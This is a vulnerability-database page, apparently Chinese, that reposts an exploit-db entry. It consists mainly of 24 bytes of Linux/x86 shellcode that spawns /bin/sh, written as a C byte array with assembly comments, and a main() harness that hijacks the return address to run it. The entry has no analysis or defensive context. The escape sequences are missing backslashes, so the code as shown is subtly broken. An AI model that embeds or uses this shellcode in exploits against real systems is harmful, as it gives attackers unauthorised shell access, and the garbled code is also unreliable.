Linux/x86 – execve(/bin/sh) Shellcode (24 bytes) (3)-安全小百科

Linux/x86 – execve(/bin/sh) Shellcode (24 bytes) (3)

漏洞ID	1054615	漏洞类型
发布时间	2004-09-12	更新时间	2004-09-12
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13444

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* 
 * [email protected]
 * 
 * execve(/bin/sh).
 *
 * 24 bytes. es lo mas chica que se puede hacer.
 *
*/
char shellcode[]=
"x31xc0"                      // xorl         %eax,%eax
"x50"                          // pushl        %eax
"x68x6ex2fx73x68"          // pushl        $0x68732f6e
"x68x2fx2fx62x69"          // pushl        $0x69622f2f
"x89xe3"                      // movl         %esp,%ebx
"x99"                          // cltd
"x52"                          // pushl        %edx
"x53"                          // pushl        %ebx
"x89xe1"                      // movl         %esp,%ecx
"xb0x0b"                      // movb         $0xb,%al
"xcdx80"                      // int          $0x80
;

main() {
        int *ret;
        ret=(int *)&ret+2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
        (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-12]

相关推荐: CVSup-Mirror以不安全方式创建临时文件漏洞

CVSup-Mirror以不安全方式创建临时文件漏洞漏洞ID 1203633 漏洞类型后置链接发布时间 2002-11-10 更新时间 2002-12-31 CVE编号 CVE-2002-2382 CNNVD-ID CNNVD-200212-259 漏洞…

文章版权归作者所有，未经允许请勿转载。

THE END